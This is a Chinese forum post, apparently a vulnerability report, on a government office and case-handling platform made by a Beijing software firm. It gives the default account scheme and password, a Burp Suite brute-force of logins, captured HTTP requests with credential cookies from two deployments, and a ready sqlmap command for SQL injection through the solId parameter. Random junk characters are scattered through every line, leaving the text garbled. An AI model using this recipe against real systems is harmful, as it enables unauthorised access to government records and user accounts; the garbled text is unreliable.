|
7 A" u: j; u$ V5 X: D {6 ?0 j: M: X
! n }) e& E, o3 X( U- e 2 |. a: W& B! _" Z8 d* d* F
2 X7 F: P, a* ]/ ] 平台简介:2 B3 C I+ w: B
* N W% @5 v5 `
% x7 f* k* h' h7 x4 @
- A5 B5 [! D( c3 u* e
& O2 g; ^5 W- t9 I' R& H* e" w& [3 E, `( l& P
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
% l* C2 t5 \/ I3 U2 u同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% b4 O: I7 ~1 W, U+ n: F# {" ~同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!0 V' a2 n: [! R. m7 L
& f0 ^! R \' |8 d. F9 ~
+ j# q( C% p/ m; ~/ S& o1 L
' Z* v8 h( x9 Y( w: i& o. k5 S
0 l1 ]- \1 ~8 ^ h+ ]
3 b% l; E, B4 T0 c
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
1 \1 L" t* f$ _; U N1 E/ H / s9 v0 W9 Q. N6 C6 w' _: B5 S
/ p3 j: Z$ g1 @& X( R8 t0 ]
' Z+ D# }$ G* |: }- | : F' p4 w+ v2 C2 ?! U
4 T% D% _4 U- {5 U
http://1.1.1.1:7197/cap-aco/#(案例2-). T0 s5 D4 f. u7 L* N1 i8 y0 E
. M8 \0 S) @' O9 c9 s2 f n: @3 V% l2 `2 D
http://www.XXOO.com (案例1-官网网站): w4 }1 m. ^/ n2 I
8 _. b+ g0 F7 Y% e
8 `" P) Y5 n: q
+ z1 | D4 E% h3 V( h9 B 2 B7 A9 x7 ]8 x+ o7 H) }! e7 h+ n
5 z0 {0 R+ M, N0 q& l+ V" z 漏洞详情:9 V( N1 O* k# i4 M" w: g
1 l6 O8 j" H- A2 d: S9 O0 B
* N, E& i- F# X# S/ D 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
/ p0 |" u+ Z. p' `5 B9 t; G # q5 s' a+ m" a% j r) Z) {3 b2 ^
, H( i$ X' T9 b6 a4 [5 }
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:+ V; o9 X9 U7 e0 \1 @, N* U
% ^4 Y ~& t6 j4 g* f# |" [5 P2 A w
; s7 P7 z' `$ E( ^# s( Z E! }3 x* A
+ c/ `9 o4 m; i
7 I0 q9 E Z' a( `" o
4 q1 E& F R% `2 I Z0 q+ _  ! F3 x8 V; }8 m( u* X9 Z: G
4 D0 s S6 `6 Z4 ^: y
3 S. M; [# r5 X% U6 R0 w5 |5 q2 t
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
. _# E! v& Z. ]$ {) U0 }) L # D/ Y( z9 K) i. z4 n2 o. ^8 t
1 l! e# a# m( p" n
1、案例1-官方网站, R* c' E6 ?' y1 d7 w
f3 f, k* \6 T$ C( i
5 |; }8 ^; r% a, y GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
/ X# C. w4 O) Z0 L+ o! H. D % r9 O' c3 a5 W2 a4 K% H
) v$ V" W( \6 h1 ?$ e5 k
Host: www.XXOO.com0 N$ E; c/ y" Y# V$ _
) c$ X4 A/ {- d- s$ ~" ^8 O0 H
& j6 }& t: A4 T/ l, V% H Proxy-Connection: Keep-Alive
! S) Z. q$ A' z1 L! [( V' S
. ?' ~ g" d5 @+ [6 J$ r* F& c* I- V
Accept: application/json, text/javascript, */*; q=0.01
4 M- o }+ f. n # v3 g* I# p4 v2 Y+ z! t
- p5 t* L) Y9 Q+ p* r" Q Accept-Language: zh-CN
( e, h" f: p+ I& v8 I 5 k# N& A$ a- r
) g3 j W2 ~* r2 {$ G
Content-Type: application/json
, P# p- P) q2 K! h
* b; } F; a1 U; l* |
$ U1 I% L: S D User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko4 u/ S- J) M# F( y# o: x
* a; O9 I+ q0 L" B) b4 f# P
+ G# I8 h" A0 f, ^, d( X X-Requested-With: XMLHttpRequest# p+ Q/ O2 Y. ]
8 ^; F8 Q. q8 S1 q* L" z! m: s" u" K9 C0 z. N. g
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002' r, L7 A [4 D0 T! ~3 u! a7 A( K5 m
) o8 Z3 o6 p, d5 _+ u" Y" x7 N( [; R# p9 x/ I- d0 K. |
Accept-Encoding: gzip, deflate, sdch6 x7 T* m, ^. [6 R4 x9 p
5 |: j0 d) ~5 y( v% m/ N7 S
6 @8 V2 X2 m9 L" C, }6 [ Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e" t$ ~- S8 ~+ T% N5 q
/ B( T/ {4 x0 r0 b8 {+ }3 `& w- H/ m# }3 j' N8 @9 |
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
3 l+ y j b" a. m7 L B5 h
& W. i- E8 c3 Z) S z* Y- K3 v$ ^2 B, |4 n2 T0 H' r* ~
 7 a: T7 s+ Z. m! b2 \2 @$ ^6 n
# P* D/ w2 i9 ~5 |( W; ?
0 Z; G' d7 t! t" Q: e! Z; y
 1 ?4 d: Q& Z7 a7 |9 e6 R: ]
$ d( }# E' \+ Y# K1 r2 u2 ]+ _+ T6 V4 M6 A3 x: P
% h6 W' V; L: E6 u+ M9 S7 E
. l3 t. p x0 |# P9 O, q' R5 ?6 M7 |' N/ O
+ b8 a1 ~; o" J' s+ K7 Y
& a$ J. W7 ^4 H- S: ^' H1 |( `0 \. {+ `+ D
( L1 m* k, p* e/ x; `5 Z
3 i0 d7 i, w+ f$ P8 T. z9 d
1 J% `) t9 p7 |: I0 }
2、案例2-某天河云平台) V! [; | @7 m; ?# ]6 Z' G9 C5 \* e
# Q9 K% k6 s1 p6 C) z% F
+ B# M \2 @3 ?% u GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.19 u7 h9 _& |0 ]; n6 T" v9 `. Y
. g4 b9 U) O6 j/ `: o5 D/ p8 r9 K) d1 w( { G
Host: 1.1.1.:7197/ L7 r5 k$ J$ q) |9 ~# ^- _
8 v+ ]. e7 b/ z1 N" U& x) V
. S# Y( t- p/ c Accept: application/json, text/javascript, */*; q=0.01) X2 x/ d7 B" {' }8 E
; J; @4 a7 l# }' N: z C3 G( P! B' i* V p9 D
X-Requested-With: XMLHttpRequest4 J) F/ y: a* L0 A8 {" u
$ _$ n6 |( d: }
3 ~% G4 V0 g) H/ q/ a8 q7 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0( O% F/ ]8 e) k% M$ q7 u7 q9 R& X
, U; L* R1 J6 v
5 q+ y2 ]! K# V0 f5 K% z3 Q Content-Type: application/json
1 ?$ _ _, x6 D' K) r$ S9 ~5 D9 m % O6 G4 ~2 ]' G/ R. ^& }3 l) Q
; Q `2 U: ]$ [; k c
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008: E3 h1 K* t8 [) K" q
4 G) m0 ~4 R& ~* w1 {
# I9 K9 @* u0 \' p8 T5 D) V9 }4 c
Accept-Language: zh-CN,zh;q=0.8% q! f& V# N1 k! G9 [/ }
+ H' [: G; Y( N e# @
9 ]' ^! y: a% B$ P# U* k/ A
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
w: \3 Z3 e& ~. c J0 \, g k" X 3 H( \' _% h8 [. q* l! G x
5 R2 a- v" u- a, [3 D( p1 e# f Connection: close' k' t* \/ x8 L3 [, |2 C+ l. X
, ^1 ]6 R2 Y) g8 @, b# h+ `' C0 Z6 D+ y& ~& z# }
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ ^8 M5 Y% B5 J/ ~4 @7 z( a
0 G; B" J9 E* S& e2 z
a3 z: ~0 R e& L4 Y, f 
% i0 J3 b% { l9 o& [+ C; V . M. s" `; g; A3 F
! \/ P/ A% \( v! u" C! @- F, i* W
1 @- w F& L7 a4 J | 
发表于 2018-10-20 20:15:17
收藏
支持
反对